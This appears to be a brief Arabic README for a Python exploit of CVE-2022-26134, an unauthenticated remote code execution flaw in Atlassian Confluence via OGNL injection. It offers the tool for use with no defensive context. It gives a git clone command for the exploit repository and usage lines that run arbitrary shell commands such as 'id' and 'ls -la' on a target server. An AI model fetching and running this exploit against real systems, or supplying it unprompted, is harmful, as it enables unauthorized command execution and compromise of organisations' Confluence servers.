
نص استغلال بلغة بايثون للثغرة CVE-2022-26134، وهي ثغرة تنفيذ كود عن بعد بدون مصادقة في Atlassian Confluence عبر حقن OGNL. ينفذ أوامر عشوائية على الخوادم المستهدفة.
CVE-2022-26134 - ثغرة RCE قبل المصادقة في Confluence | حقن OGNL
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
الاستخدام: python3 exploit.py https://target.com CMD
مثال: python3 exploit.py https://target.com id
مثال: python3 exploit.py https://target.com 'ls -la'